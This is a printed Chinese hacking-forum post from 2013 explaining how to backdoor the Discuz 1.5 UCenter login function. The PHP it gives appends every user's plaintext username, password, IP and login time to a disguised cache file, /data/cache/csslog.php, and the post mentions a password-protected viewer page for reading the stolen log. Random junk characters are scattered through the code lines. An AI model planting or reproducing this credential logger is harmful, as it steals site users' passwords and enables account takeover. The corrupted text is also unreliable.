中国网络渗透测试联盟

标题: dz1.5记录用户名和密码 [打印本页]
作者: admin    时间: 2013-2-27 21:40
标题: dz1.5记录用户名和密码
修改uc_client目录下的client.php 在
/ v4 P* m2 p( a7 t# ?function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
0 c/ c, C% j$ g$ A& E  s+ f下加入如上代码,在网站./data/cache/目录下自动生成csslog.php" d9 v0 {% n* a  q& A# r
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw4 v% t" l( y, l+ l
if(getenv('HTTP_CLIENT_IP')) {
$ F" k2 [# n$ L, A0 z8 W2 P$onlineip = getenv('HTTP_CLIENT_IP');* u' Z7 A, C, Y" ?8 X( p
} elseif(getenv('HTTP_X_FORWARDED_FOR')) { 3 A5 S8 T$ l, ~0 N* Z% Q
$onlineip = getenv('HTTP_X_FORWARDED_FOR');% A) X, O! C" u8 B9 ?6 D+ y( ?$ ~
} elseif(getenv('REMOTE_ADDR')) {
7 A, \$ M6 I$ t$onlineip = getenv('REMOTE_ADDR');
7 L, M6 m/ L3 R% W: @} else {
$ l# z+ c. }3 y. z* H, Z$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];9 H" i8 `( L& J6 p* Q8 b1 D
}9 v% m! U* |) l& K; l
     $showtime=date("Y-m-d H:i:s");. t7 r* d* W. z' I6 {8 a
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";( i( S# w1 a, |* l, Z, N4 V8 T
    $handle=fopen('./data/cache/csslog.php','a+');! Q- h0 [( C( K+ t
    $write=fwrite($handle,$record);



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2